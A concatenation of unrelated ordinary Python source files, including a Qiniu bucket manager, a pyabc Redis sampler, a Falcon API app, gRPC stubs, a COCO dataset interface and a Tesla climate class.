一个ResponseInfo对象
"""
resource = entry(bucket, key)
return self.__io_do('prefetch', resource)
def change_mime(self, bucket, key, mime):
"""修改文件mimeType:
主动修改指定资源的文件类型,具体规格参考:
http://developer.qiniu.com/docs/v6/api/reference/rs/chgm.html
Args:
bucket: 待操作资源所在空间
key: 待操作资源文件名
mime: 待操作文件目标mimeType
"""
resource = entry(bucket, key)
encode_mime = urlsafe_base64_encode(mime)
return self.__rs_do('chgm', resource, 'mime/{0}'.format(encode_mime))
def batch(self, operations):
"""批量操作:
在单次请求中进行多个资源管理操作,具体规格参考:
http://developer.qiniu.com/docs/v6/api/reference/rs/batch.html
Args:
operations: 资源管理操作数组,可通过
Returns:
一个dict变量,返回结果类似:
[
{ "code": <HttpCode int>, "data": <Data> },
{ "code": <HttpCode int> },
{ "code": <HttpCode int> },
{ "code": <HttpCode int> },
{ "code": <HttpCode int>, "data": { "error": "<ErrorMessage string>" } },
...
]
一个ResponseInfo对象
"""
url = 'http://{0}/batch'.format(config.get_default('default_rs_host'))
return self.__post(url, dict(op=operations))
def buckets(self):
"""获取所有空间名:
获取指定账号下所有的空间名。
Returns:
一个dict变量,类似:
[ <Bucket1>, <Bucket2>, ... ]
一个ResponseInfo对象
"""
return self.__rs_do('buckets')
def __rs_do(self, operation, *args):
return self.__server_do(config.get_default('default_rs_host'), operation, *args)
def __io_do(self, operation, *args):
return self.__server_do(config.get_default('default_io_host'), operation, *args)
def __server_do(self, host, operation, *args):
cmd = _build_op(operation, *args)
url = 'http://{0}/{1}'.format(host, cmd)
return self.__post(url)
def __post(self, url, data=None):
return http._post_with_auth(url, data, self.auth)
def __get(self, url, params=None):
return http._get(url, params, self.auth)
def _build_op(*args):
return '/'.join(args)
def build_batch_copy(source_bucket, key_pairs, target_bucket):
return _two_key_batch('copy', source_bucket, key_pairs, target_bucket)
def build_batch_rename(bucket, key_pairs):
return build_batch_move(bucket, key_pairs, bucket)
def build_batch_move(source_bucket, key_pairs, target_bucket):
return _two_key_batch('move', source_bucket, key_pairs, target_bucket)
def build_batch_delete(bucket, keys):
return _one_key_batch('delete', bucket, keys)
def build_batch_stat(bucket, keys):
return _one_key_batch('stat', bucket, keys)
def _one_key_batch(operation, bucket, keys):
return [_build_op(operation, entry(bucket, key)) for key in keys]
def _two_key_batch(operation, source_bucket, key_pairs, target_bucket):
if target_bucket is None:
target_bucket = source_bucket
return [_build_op(operation, entry(source_bucket, k), entry(target_bucket, v)) for k, v in key_pairs.items()]
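# --- Hedged usage sketch (not part of the original module) ---
# Assumes a valid access/secret key pair; bucket and object names below are
# placeholders.
def _example_bucket_usage():
    from qiniu import Auth
    q = Auth('ACCESS_KEY', 'SECRET_KEY')  # placeholder credentials
    bm = BucketManager(q)
    # list at most 10 keys under the 'img/' prefix
    ret, eof, info = bm.list('mybucket', prefix='img/', limit=10)
    if ret is not None:
        for item in ret.get('items', []):
            print(item['key'])
    # batch-delete two objects using the helpers defined above
    ops = build_batch_delete('mybucket', ['a.jpg', 'b.jpg'])
    ret, info = bm.batch(ops)
    print(info.status_code)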
|
nilq/baby-python
|
python
|
import numpy as np
import pickle
from time import sleep
import cloudpickle
from redis import StrictRedis
from ...sampler import Sampler
from .cmd import (SSA, N_EVAL, N_ACC, N_REQ, ALL_ACCEPTED,
N_WORKER, QUEUE, MSG, START,
SLEEP_TIME, BATCH_SIZE)
from .redis_logging import logger
class RedisEvalParallelSampler(Sampler):
"""
Redis based low latency sampler.
    This sampler performs well in distributed environments.
    It is usually faster than the
:class:`pyabc.sampler.DaskDistributedSampler` for
short model evaluation runtimes. The longer the model evaluation times,
the less the advantage becomes. It requires a running Redis server as
broker.
This sampler requires workers to be started via the command
``abc-redis-worker``.
An example call might look like
``abc-redis-worker --host=123.456.789.123 --runtime=2h``
    to connect to a Redis server on IP ``123.456.789.123`` and to terminate
    the worker after it finishes the first population that ends more than 2
    hours after worker start; the actual runtime may therefore exceed 2h.
See ``abc-redis-worker --help`` for its options.
Use the command ``abc-redis-manager`` to retrieve info and stop the running
workers.
Start as many workers as you wish. Workers can be dynamically added
during the ABC run.
Parameters
----------
host: str, optional
IP address or name of the Redis server.
Default is "localhost".
port: int, optional
Port of the Redis server.
Default is 6379.
password: str, optional
Password for a protected server. Default is None (no protection).
batch_size: int, optional
Number of model evaluations the workers perform before contacting
        the Redis server. Defaults to 1. Increase this value if model
evaluation times are short or the number of workers is large
to reduce communication overhead.
"""
def __init__(self,
host: str = "localhost",
port: int = 6379,
password: str = None,
batch_size: int = 1):
super().__init__()
logger.debug(
f"Redis sampler: host={host} port={port}")
# handles the connection to the redis-server
self.redis = StrictRedis(host=host, port=port, password=password)
self.batch_size = batch_size
def n_worker(self):
"""
Get the number of connected workers.
Returns
-------
Number of workers connected.
"""
return self.redis.pubsub_numsub(MSG)[0][-1]
def sample_until_n_accepted(
self, n, simulate_one, max_eval=np.inf, all_accepted=False):
# open pipeline
pipeline = self.redis.pipeline()
# write initial values to pipeline
self.redis.set(
SSA, cloudpickle.dumps((simulate_one, self.sample_factory)))
pipeline.set(N_EVAL, 0)
pipeline.set(N_ACC, 0)
pipeline.set(N_REQ, n)
pipeline.set(ALL_ACCEPTED, int(all_accepted)) # encode as int
pipeline.set(N_WORKER, 0)
pipeline.set(BATCH_SIZE, self.batch_size)
# delete previous results
pipeline.delete(QUEUE)
# execute all commands
pipeline.execute()
id_results = []
# publish start message
self.redis.publish(MSG, START)
# wait until n acceptances
while len(id_results) < n:
# pop result from queue, block until one is available
dump = self.redis.blpop(QUEUE)[1]
# extract pickled object
particle_with_id = pickle.loads(dump)
# append to collected results
id_results.append(particle_with_id)
# wait until all workers done
while int(self.redis.get(N_WORKER).decode()) > 0:
sleep(SLEEP_TIME)
# make sure all results are collected
while self.redis.llen(QUEUE) > 0:
id_results.append(pickle.loads(self.redis.blpop(QUEUE)[1]))
# set total number of evaluations
self.nr_evaluations_ = int(self.redis.get(N_EVAL).decode())
# delete keys from pipeline
pipeline = self.redis.pipeline()
pipeline.delete(SSA)
pipeline.delete(N_EVAL)
pipeline.delete(N_ACC)
pipeline.delete(N_REQ)
pipeline.delete(ALL_ACCEPTED)
pipeline.delete(BATCH_SIZE)
pipeline.execute()
# avoid bias toward short running evaluations (for
# dynamic scheduling)
id_results.sort(key=lambda x: x[0])
id_results = id_results[:n]
results = [res[1] for res in id_results]
# create 1 to-be-returned sample from results
sample = self._create_empty_sample()
for j in range(n):
sample += results[j]
return sample
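# --- Hedged usage sketch (not part of the original module) ---
# Assumes a Redis server on localhost and workers started separately via
# ``abc-redis-worker``; the model, prior and distance are toy placeholders.
def _example_redis_abc():
    import pyabc
    def model(parameters):
        return {"y": parameters["x"] + 0.1}
    def distance(x, y):
        return abs(x["y"] - y["y"])
    prior = pyabc.Distribution(x=pyabc.RV("uniform", 0, 1))
    sampler = RedisEvalParallelSampler(host="localhost", port=6379, batch_size=2)
    return pyabc.ABCSMC(model, prior, distance, sampler=sampler)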
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
import falcon.asgi
import log
from app.api.common import base
from app.api.v1.auth import login
from app.api.v1.member import member
from app.api.v1.menu import menu
from app.api.v1.statistics import image
from app.api.v1.twitter import tweet
from app.api.v1.user import users
from app.database import db_session, init_session
from app.errors import AppError
from app.middleware import AuthHandler, JSONTranslator, DatabaseSessionManager, CORSMiddleware, WebsocketHandler
LOG = log.get_logger()
class App(falcon.asgi.App):
def __init__(self, *args, **kwargs):
super(App, self).__init__(*args, **kwargs)
LOG.info("API Server is starting")
self.add_route("/", base.BaseResource())
self.add_route("/v1/login", login.Auth())
self.add_route("/v1/statistics/count/image", image.Count())
self.add_route("/v1/menu/list", menu.Menu())
self.add_route("/v1/users", users.Collection())
self.add_route("/v1/users/{user_id}", users.Item())
self.add_route("/v1/users/self/login", users.Self())
self.add_route("/v1/member/list", member.List())
self.add_route("/v1/member/customes", member.Customes())
self.add_route("/v1/member/tags", member.Tags())
self.add_route("/v1/member/tweets", member.Tweets())
self.add_route("/v1/member/tweet/live", member.TweetLive())
self.add_route("/v1/member/youtube/channel/list", member.Collection())
self.add_route("/v1/twitter", tweet.TwitterList())
self.add_route("/v1/tweet/draws", tweet.Draws())
self.add_route("/v1/tweet/draws/live", tweet.DrawsLive())
self.add_route("/v1/tweet/custom/draws", tweet.CustomDraws())
self.add_route("/v1/tweet/custom/tags", tweet.CustomTags())
self.add_route("/v1/tweet/renewer/draws", tweet.RenewerDraws())
self.add_route("/v1/tweet/detail", tweet.TweetInfo())
self.add_route("/v1/tweet/ids", tweet.TweetIds())
self.add_route("/v1/tweet/member/{memeber_id}", users.Self())
self.add_route("/robots.txt", DenyCrawlers())
self.add_error_handler(AppError, AppError.handle)
class DenyCrawlers(object):
async def on_get(self, req, resp):
resp.body = "User-agent: *\nDisallow: /\n"
init_session()
middleware = [CORSMiddleware(), AuthHandler(), JSONTranslator(), DatabaseSessionManager(db_session), WebsocketHandler()]
application = App(middleware=middleware, cors_enable=True)
if __name__ == "__main__":
# from wsgiref import simple_server
#
# httpd = simple_server.make_server("127.0.0.1", 8000, application)
# httpd.serve_forever()
import uvicorn
uvicorn.run(application, host="0.0.0.0", port=8000, log_level="info", ws_ping_interval=10,
ws_ping_timeout=60 * 60, timeout_keep_alive=60 * 5)
|
nilq/baby-python
|
python
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from . import ParameterConstraintProvider_pb2 as ParameterConstraintProvider__pb2
class ParameterConstraintsProviderStub(object):
"""Feature: Parameter Constraint Provider
Allows a server to apply constraints on specific command parameters after design time. It is recommended to
specify
the constraints in the Feature Definitions whenever possible.
The constraints given by this Feature act as a logical AND to any constraints already defined in the Feature
Definition.
As an example: A constrained type has a Pattern Constraint, then the ParameterConstraintProvider specifies an
additional
Pattern Constraint - in this case the underlying SiLA Type has to follow BOTH Patterns defined.
    The constraints can be retrieved by reading and subscribing to the corresponding dynamic property.
Example use-case: Loading and setting the positions a mobile robot can move to at runtime.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Subscribe_ParametersConstraints = channel.unary_stream(
'/sila2.org.silastandard.core.parameterconstraintsprovider.v1.ParameterConstraintsProvider/Subscribe_ParametersConstraints',
request_serializer=ParameterConstraintProvider__pb2.Subscribe_ParametersConstraints_Parameters.SerializeToString,
response_deserializer=ParameterConstraintProvider__pb2.Subscribe_ParametersConstraints_Responses.FromString,
)
class ParameterConstraintsProviderServicer(object):
"""Feature: Parameter Constraint Provider
Allows a server to apply constraints on specific command parameters after design time. It is recommended to
specify
the constraints in the Feature Definitions whenever possible.
The constraints given by this Feature act as a logical AND to any constraints already defined in the Feature
Definition.
As an example: A constrained type has a Pattern Constraint, then the ParameterConstraintProvider specifies an
additional
Pattern Constraint - in this case the underlying SiLA Type has to follow BOTH Patterns defined.
    The constraints can be retrieved by reading and subscribing to the corresponding dynamic property.
Example use-case: Loading and setting the positions a mobile robot can move to at runtime.
"""
def Subscribe_ParametersConstraints(self, request, context):
"""Parameters Constraints
Parameter Constraints that constrain any specified parameters within this structure
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_ParameterConstraintsProviderServicer_to_server(servicer, server):
rpc_method_handlers = {
'Subscribe_ParametersConstraints': grpc.unary_stream_rpc_method_handler(
servicer.Subscribe_ParametersConstraints,
request_deserializer=ParameterConstraintProvider__pb2.Subscribe_ParametersConstraints_Parameters.FromString,
response_serializer=ParameterConstraintProvider__pb2.Subscribe_ParametersConstraints_Responses.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'sila2.org.silastandard.core.parameterconstraintsprovider.v1.ParameterConstraintsProvider', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
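# --- Hedged usage sketch (not part of the generated code) ---
# The address is a placeholder; assumes a SiLA server implementing this
# feature is reachable there.
def _example_subscribe(address='localhost:50052'):
    channel = grpc.insecure_channel(address)
    stub = ParameterConstraintsProviderStub(channel)
    request = ParameterConstraintProvider__pb2.Subscribe_ParametersConstraints_Parameters()
    for response in stub.Subscribe_ParametersConstraints(request):
        print(response)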
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import numpy as np
import os
import sys
from observations.util import maybe_download_and_extract
def tobacco(path):
"""Households Tobacco Budget Share
a cross-section from 1995-96
*number of observations* : 2724
*observation* : individuals
*country* : Belgium
A dataframe containing :
occupation
a factor with levels (bluecol,whitecol,inactself), the last level
being inactive and self-employed
region
a factor with levels (flanders,wallon,brussels)
nkids
number of kids of more than two years old
nkids2
number of kids of less than two years old
nadults
number of adults in household
lnx
log of total expenditures
stobacco
budgetshare of tobacco
salcohol
budgetshare of alcohol
age
age in brackets (0-4)
National Institute of Statistics (NIS), Belgium.
Args:
path: str.
Path to directory which either stores file or otherwise file will
be downloaded and extracted there.
Filename is `tobacco.csv`.
Returns:
Tuple of np.ndarray `x_train` with 2724 rows and 9 columns and
dictionary `metadata` of column headers (feature names).
"""
import pandas as pd
path = os.path.expanduser(path)
filename = 'tobacco.csv'
if not os.path.exists(os.path.join(path, filename)):
url = 'http://dustintran.com/data/r/Ecdat/Tobacco.csv'
maybe_download_and_extract(path, url,
save_file_name='tobacco.csv',
resume=False)
data = pd.read_csv(os.path.join(path, filename), index_col=0,
parse_dates=True)
x_train = data.values
metadata = {'columns': data.columns}
return x_train, metadata
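# --- Hedged usage sketch (not part of the original module) ---
if __name__ == '__main__':
    # downloads tobacco.csv into ~/data on first use, then loads it
    x_train, metadata = tobacco('~/data')
    print(x_train.shape)             # expected: (2724, 9)
    print(list(metadata['columns']))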
|
nilq/baby-python
|
python
|
from .wheel import Wheel
from .tree import SyncTree
|
nilq/baby-python
|
python
|
from .exceptions import ApigeeError
|
nilq/baby-python
|
python
|
"""Const for Velbus."""
DOMAIN = "velbus"
CONF_MEMO_TEXT = "memo_text"
SERVICE_SET_MEMO_TEXT = "set_memo_text"
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from typing import List, Optional, Tuple
from .signal import Signal
from .light import Light
from .tv import TV
class Appliance:
def __str__(self):
return f"{self.__class__.__name__}: {self.nickname}"
    def __init__(self, data: dict) -> None:
        self._set_member(data)
    def update(self, data: dict) -> None:
        self._set_member(data)
    def _set_member(self, data: dict) -> None:
self.id: str = data["id"]
self.model: dict = data["model"]
self.nickname: str = data["nickname"]
self.name: str = data["nickname"] # alias for nickname
self.image: str = data["image"]
self.type: str = data["type"]
self.settings: dict = data["settings"]
self.aircon: dict = data["aircon"]
self.light: Light = Light(self.id, data["light"]) if self.type == "LIGHT" else None
self.tv: TV = TV(self.id, data["tv"]) if self.type == "TV" else None
self.signals: List = [Signal(**signal) for signal in data["signals"]]
    def signal(self, name: str) -> Tuple[Optional[Signal], bool]:
result: Optional[Signal] = next(filter(lambda x: name == x.name, self.signals), None)
return result, (result is not None)
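# --- Hedged usage sketch (not part of the original module) ---
# The dict mirrors the payload _set_member expects; all values are
# illustrative placeholders (type "IR" avoids the Light/TV sub-parsing).
def _example_appliance():
    appliance = Appliance({
        "id": "appliance-1", "model": {}, "nickname": "Bedroom Fan",
        "image": "ico_fan", "type": "IR", "settings": {},
        "aircon": None, "light": None, "tv": None, "signals": [],
    })
    sig, found = appliance.signal("power")  # (None, False) when no such signal
    print(appliance, found)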
|
nilq/baby-python
|
python
|
"""
COCO provides a simple way to use the COCO data set through a standardized interface. Using this
module can reduce the complexity of the code that gathers and prepares COCO data. The module also
provides a standardized, simple interface which could be used with any data set containing image file
locations and bboxes.
#########
# USAGE #
#########
# set category filters
param_coco_cat_filters = [['person'], ['car'], ['bus'], ['truck']]
# set coco dataset locations
param_coco_annotation_file = '..\\COCO\\annotations_trainval2017\\annotations\\instances_train2017.json'
param_coco_img_dir = '..\\COCO\\annotations_trainval2017\\images\\train2017\\'
# load data set
coco = COCO.CocoDatasetInterface(param_coco_annotation_file, param_coco_img_dir)
data_x, data_y, data_dict_cat = coco.get_category_labeled_images(param_coco_cat_filters)
########################
# STANDARD DATA FORMAT #
########################
data_x is a list of image file locations [image_file_locations, ...]
data_y is a list with labels [[[bbox1_img1, bbox1_category_img1], [bbox2_img1, bbox2_category_img1], ...],
[[bbox1_img2, bbox1_category_img2], [bbox2_img2, bbox2_category_img2], ...],
...]
The bboxN_imgN variables specify the actual bboxes in format [x,y,width,height] where x and y are the left top corner
position of the bbox.
"""
from pycocotools.coco import COCO
from BasicLib.BasicFunctions import *
def show_coco_data_point(img, label_list, load_image_from_file=False):
"""
Display coco data set image and labels.
:param img: loaded image of image file location
:param label_list: labels
:param load_image_from_file: interprets 'img' as file location when True.
"""
image = img
if load_image_from_file:
image = load_image(img)
for bbox, category in label_list:
pt1 = (int(bbox[0]), int(bbox[1]))
pt2 = (int(pt1[0] + bbox[2]), int(pt1[1] + bbox[3]))
color = (np.random.random((1, 3)) * 255).tolist()[0]
cv2.rectangle(image, pt1, pt2, color, 2)
show_image(image)
class CocoDatasetInterface:
"""
    This class forms an easy-to-use interface meant to serve the data to a machine learning algorithm. Using this
    class can reduce the complexity of the code that gathers and prepares data. The class also provides a
    standardized, simple interface which could be used with any data set containing image file locations and bboxes.
EXAMPLE:
from DataLibrary.COCO import *
coco_annotation_file = '..\\COCO\\annotations_trainval2017\\annotations\\instances_train2017.json'
coco_image_folder = '..\\COCO\\annotations_trainval2017\\images\\train2017\\'
coco = CocoDatasetInterface(coco_annotation_file, coco_image_folder)
images, labels, cat_dict = coco.get_category_labeled_images([['person'], ['car', 'bicycle', 'dog']])
coco.print_available_categories()
show_coco_data_point(images[0], labels[0], True)
"""
def __init__(self, coco_ann_file, coco_img_dir):
"""
Initialize class.
:param coco_ann_file: file location of the COCO data set annotation file
:param coco_img_dir: file location of the COCO data set image files
"""
# self.coco_annotation_file = coco_ann_file
self.coco_image_folder = coco_img_dir
self.coco = COCO(coco_ann_file)
self.categories = self.coco.loadCats(self.coco.getCatIds())
self.filtered_category_ids = None
def print_available_categories(self):
"""Prints all the Coco data set categories."""
print("ID: Category: Super Category:")
for cat in self.categories:
print("{:2} {:15} {}".format(cat['id'], cat['name'], cat['supercategory']))
print()
def get_images_ids(self, cat_nested_list):
"""
        Returns the specifications of the images which meet the given category filter, together with the
        matching category ids. The specifications can be used to load the images themselves.
        :param cat_nested_list: a list of lists, each inner list describing the items which have to be in the image,
            in the following format: [['car'], ['cat', 'horse']]
        :return: list of image specifications, list of category ids
"""
img_id_list = []
total_cat_list = []
for cat_list in cat_nested_list:
cat_id_list = self.coco.getCatIds(catNms=cat_list)
total_cat_list += cat_id_list
img_id_list += self.coco.getImgIds(catIds=cat_id_list)
img_spec_list = self.coco.loadImgs(set(img_id_list))
total_cat_list = list(set(total_cat_list))
return img_spec_list, total_cat_list
def build_category_dict(self, cat_list):
"""
        Creates two dictionaries: one linking normalized category ids to category names, and one linking
        coco category ids to normalized ids. These dictionaries make id normalization and id-to-name lookups easy.
        Returns two dictionaries:
            cat_dict[0 .. n_categories] => cat_name
            cat_translate_dict[coco_cat_id] => normalized_cat
        :param cat_list: list of coco category ids
        :return: cat_dict, cat_translate_dict
"""
cat_spec_list = self.coco.loadCats(cat_list)
cat_dict = {}
cat_translate_dict = {}
for cat_spec, normalized_id in zip(cat_spec_list, range(len(cat_spec_list))):
cat_dict[normalized_id] = cat_spec['name']
cat_translate_dict[cat_spec['id']] = normalized_id
return cat_dict, cat_translate_dict
def load_image_annotations(self, img_spec, cat_translate_dict, cat_list):
"""
        Returns the annotation list for the given img_spec as bboxes in format
        [[[x,y,width,height], bbox_category_id], ...], keeping only bboxes whose category is in cat_list.
        :param img_spec: coco image specification
        :param cat_translate_dict: cat_translate_dict[coco_cat_id] => normalized_cat
        :param cat_list: list of coco category ids
        :return: list of bboxes in format [[[x,y,width,height], bbox_category_id], ...], and a list with the
            annotation count per category
"""
img_bboxes = []
ann_count_per_cat = [0] * len(cat_list)
ann_spec_list = self.coco.loadAnns(self.coco.getAnnIds(imgIds=img_spec['id']))
for ann_spec in ann_spec_list:
if ann_spec['category_id'] in cat_list and ann_spec['iscrowd'] == 0:
img_bboxes.append([ann_spec['bbox'], cat_translate_dict[ann_spec['category_id']]])
ann_count_per_cat[cat_translate_dict[ann_spec['category_id']]] += 1
return img_bboxes, ann_count_per_cat
def get_image_file_location(self, img_spec):
"""
Returns image file location
:param img_spec: coco image specification
:return: image file location
"""
return self.coco_image_folder + img_spec['file_name']
def get_category_labeled_images(self, cat_nested_list, verbose=True, print_func=print):
"""
        This function forms the actual interface and output of the class, providing the coco data in a standardized
        and simple format.
        Returns a list of image file locations [image_file_locations, ...], a list of labels
        [[bounding box, bbox category], ...] and a dictionary linking the category names to their ids. The images
        contain all the categories specified in the 'cat_nested_list' parameter.
        :param cat_nested_list: a list of lists, each inner list describing the items which have to be in the image.
        :param verbose: if True, print a description of the selected data.
        :param print_func: function used to print the 'verbose' information; the built-in print by default.
        :return: a list of image file locations, a list of corresponding labels in format
            [[[x,y,width,height], bbox_category_id], ...], ...]
            and a dictionary linking the category names to their ids.
        example:
            get_category_labeled_images([['person'], ['car', 'bicycle', 'dog']], verbose=False)
            returns images with at least one person in them AND images with at least a car AND a bicycle AND a dog.
            Labels for every selected category are added to each image, so an image selected for containing a car
            AND a bicycle AND a dog may also contain person labels.
"""
img_spec_list, cat_list = self.get_images_ids(cat_nested_list)
cat_dict, cat_translate_dict = self.build_category_dict(cat_list)
# load images and annotations
x_data = []
y_data = []
total_ann_count = np.array([0] * len(cat_list))
for img_spec in img_spec_list:
image_file = self.get_image_file_location(img_spec)
image_bboxes, img_ann_count = self.load_image_annotations(img_spec, cat_translate_dict, cat_list)
total_ann_count += img_ann_count
x_data.append(image_file)
y_data.append(image_bboxes)
# display data details
if verbose:
print_func("Categories selected: {}".format(cat_dict))
print_func("Total images: {}".format(len(img_spec_list)))
for cat_id, cat_ann_count in zip(range(len(total_ann_count)), total_ann_count):
print_func("Annotations in \"{}\": {}".format(cat_dict[cat_id], cat_ann_count))
return x_data, y_data, cat_dict
def get_image_sizes(self, cat_nested_list):
"""
        Returns a list of image sizes in pixels. If the same value is used for the 'cat_nested_list' parameter as
        with the 'get_category_labeled_images' method, the returned sizes will match its data_x and data_y result
        lists. So:
img_size_list[i] belongs to data_x[i] and data_y[i]
:param cat_nested_list: is a list of lists, each inner list describing the items which has to be in the image.
:return: list of image sizes in format [[width, height], ...]
"""
img_size_list = []
img_spec_list, cat_list = self.get_images_ids(cat_nested_list)
for img_spec in img_spec_list:
img_size_list.append([img_spec['width'], img_spec['height']])
return img_size_list
|
nilq/baby-python
|
python
|
import os
# build the export list for `from package import *` (presumably meant to be __all__)
__all__ = [i[:-3] for i in os.listdir(os.path.dirname(__file__)) if i.endswith(".py") and not i.startswith(".")]
|
nilq/baby-python
|
python
|
import sys
from datetime import datetime
from datapipe.configuracoes import Configuracoes
from datapipe.converters.tabela_hadoop import TabelaHadoop
from datapipe.datasources.db2 import Db2
from datapipe.utils.constantes import YAML_CONTINUA_ERRO
from datapipe.utils.log import Log, Niveis
class TabelaControleException(Exception):
pass
class TabelaControle:
def __init__(self, config: Configuracoes, nome_pipeline: str, bigsql: Db2, tabela: TabelaHadoop):
self.config = config
self.nome_pipeline = nome_pipeline
self.bigsql = bigsql
self.tabela = tabela
def registrar_erro(self, erro: Exception = None):
if erro:
self.tabela.mensagem_erro = str(erro)
Log.logar(erro, Niveis.ERROR)
self.salvar()
if self.tabela.continuar_em_erro:
            Log.logar(
                f"Error in {self.nome_pipeline} for table {self.tabela.nome}. Elapsed time {self.tabela.timer}.", Niveis.ERROR)
return True
else:
raise TabelaControleException(f"Erro na {self.nome_pipeline} da tabela {self.tabela.nome}, processo FINALIZADO "
f"conforme a flag '{YAML_CONTINUA_ERRO}'.")
def iniciar(self):
        Log.logar(
            f"Starting {self.nome_pipeline} for table '{self.tabela.nome}'.", Niveis.INFO_DESTAQUE)
self.tabela.inicializar_temporizador()
self.bigsql.selecionar_schema(self.tabela.schema)
def finalizar(self):
if not self.tabela.mensagem_erro:
self.salvar()
registros = f"{int(self.tabela.qdte_registros):,}".replace(
",", ".")
            Log.logar(
                f"{self.nome_pipeline} for table {self.tabela.nome} finished in {self.tabela.timer}. {registros} records generated.", Niveis.INFO_DESTAQUE)
def salvar(self):
valores = {}
valores['JOB_CONFIG'] = self.config.nome_job
valores['PIPELINE'] = self.nome_pipeline
valores['DATA_PROC_CARGA'] = datetime.today().date()
valores['TABELA_PROC'] = self.tabela.nome_com_schema
valores['DATA_HORA_TABELA'] = datetime.today()
valores['QTD_REGISTROS'] = self.tabela.qdte_registros
if self.tabela.mensagem_erro:
valores['ERRO_BASE'] = str(self.tabela.mensagem_erro)[:520]
valores['TEMPO_TABELA'] = str(self.tabela.timer)
valores['KB_TRANSFERIDO'] = self.tabela.kb_transferido
schema = self.tabela.schema
tabela_controle = self.config.tabela_controle
try:
if "." in tabela_controle:
schema, tabela_controle = tabela_controle.split(".")
            # TODO: check how many physical files the configured control table has;
            # do this at application startup, when configuring/zipping the log.
            # > What to do: recreate the control table with an INSERT ... SELECT to reduce the number of files
self.bigsql.salvar_registro(
tabela_controle, valores, schema=schema)
except Exception:
_, mensagem, _ = sys.exc_info()
if any(erro for erro in ['SQL0204N', 'SQL0206N'] if erro in str(mensagem)):
self.__reconfigurar_tabela_controle(
tabela_controle, schema, valores, mensagem)
else:
raise TabelaControleException(mensagem)
def __reconfigurar_tabela_controle(self, tabela_controle, schema, valores, mensagem_erro):
DDL_VERSAO_04 = {'JOB_CONFIG': 'VARCHAR(100)',
'PIPELINE': 'VARCHAR(100)',
'DATA_PROC_CARGA': 'DATE',
'TABELA_PROC': 'VARCHAR(255)',
'DATA_HORA_TABELA': 'TIMESTAMP',
'TEMPO_TABELA': 'VARCHAR(10)',
'QTD_REGISTROS': 'INTEGER',
'KB_TRANSFERIDO': 'VARCHAR(30)',
'ERRO_BASE': 'VARCHAR(520)'}
try:
if 'SQL0204N' in str(mensagem_erro):
if self.bigsql.criar_tabela(tabela_controle, DDL_VERSAO_04, schema=schema):
self.bigsql.salvar_registro(
tabela_controle, valores, schema=schema)
if 'SQL0206N' in str(mensagem_erro):
tabela_controle_backup = f'{tabela_controle}_VERSAO_03'
self.bigsql.renomear_tabela(
nome_antigo=tabela_controle, nome_novo=tabela_controle_backup, schema=schema)
if self.bigsql.criar_tabela(tabela_controle, DDL_VERSAO_04, schema=schema):
self.bigsql.executar_script(self.__carregar_migracao(
tabela_controle_backup, tabela_controle, schema))
self.bigsql.salvar_registro(
tabela_controle, valores, schema=schema)
else:
                    # Table creation failed: rename the backup back so the existing data is not lost
self.bigsql.renomear_tabela(
nome_antigo=tabela_controle_backup, nome_novo=tabela_controle, schema=schema)
except Exception as ex:
raise TabelaControleException(ex)
def __carregar_migracao(self, nome_origem, nome_destino, schema):
script_versao04 = f"INSERT INTO {schema}.{nome_destino} " \
f"SELECT NULL AS JOB_CONFIG, NULL AS PIPELINE, DATA_PROC_CARGA, " \
f"TABELA_PROC, DATA_HORA_TABELA, TEMPO_TABELA, QTD_REGISTROS, " \
f"KB_TRANSFERIDO, ERRO_BASE " \
f"FROM {schema}.{nome_origem}"
return script_versao04
|
nilq/baby-python
|
python
|
import inspect
from enum import Enum
from typing import Callable, cast, TypeVar
from .._internal.default_container import get_default_container
from ..core import DependencyContainer
from ..providers import IndirectProvider
T = TypeVar('T', bound=type)
def implements(interface: type,
*,
state: Enum = None,
container: DependencyContainer = None) -> Callable[[T], T]:
"""
Class decorator declaring the underlying class as a (possible) implementation
    to be used by Antidote when the specified interface is requested.
For now, the underlying class needs to be decorated with @register.
Args:
interface: Interface implemented by the decorated class.
        state: If multiple implementations exist for an interface, an
            :py:class:`~enum.Enum` should be used to identify all the possible
            states the application may be in. Each state should be associated with
            one implementation. At runtime Antidote will retrieve the state
            (a member of that :py:class:`~enum.Enum`) to determine the current implementation.
container: :py:class:`~.core.container.DependencyContainer` from which
the dependencies should be retrieved. Defaults to the global
container if it is defined.
Returns:
The decorated class, unmodified.
"""
container = container or get_default_container()
def register_implementation(cls):
if not inspect.isclass(cls):
raise TypeError("implements must be applied on a class, "
"not a {}".format(type(cls)))
if not issubclass(cls, interface):
raise TypeError("{} does not implement {}.".format(cls, interface))
interface_provider = cast(IndirectProvider,
container.providers[IndirectProvider])
interface_provider.register(interface, cls, state)
return cls
return register_implementation
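# --- Hedged usage sketch (not part of the original module) ---
# Kept as comments because antidote's registration API differs across
# versions; Database/PostgresDatabase are illustrative placeholders and, as
# the docstring notes, the implementation class must also be @register-ed.
#
# @implements(Database)
# @register
# class PostgresDatabase(Database):
#     ...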
|
nilq/baby-python
|
python
|
# Numpy exercises - 32
# *******************
import numpy as np
print(np.sqrt(16))
print(np.emath.sqrt(-16))  # complex numbers
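# Expected output: np.sqrt(16) prints 4.0, while np.sqrt(-16) would give nan
# (with a warning); np.emath.sqrt switches to the complex domain and prints 4j.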
|
nilq/baby-python
|
python
|
# SPDX-License-Identifier: Apache-2.0
"""
Python Package for controlling Tesla API.
For more details about this api, please refer to the documentation at
https://github.com/zabuldon/teslajsonpy
"""
import time
from typing import Text
from teslajsonpy.vehicle import VehicleDevice
class Climate(VehicleDevice):
"""Home-assistant class of HVAC for Tesla vehicles.
    This is intended to be partially inherited by a Home-Assistant entity.
"""
def __init__(self, data, controller):
"""Initialize the environmental controls.
Vehicles have both a driver and passenger.
Parameters
----------
data : dict
The base state for a Tesla vehicle.
https://tesla-api.timdorr.com/vehicle/state/data
controller : teslajsonpy.Controller
The controller that controls updates to the Tesla API.
Returns
-------
None
"""
super().__init__(data, controller)
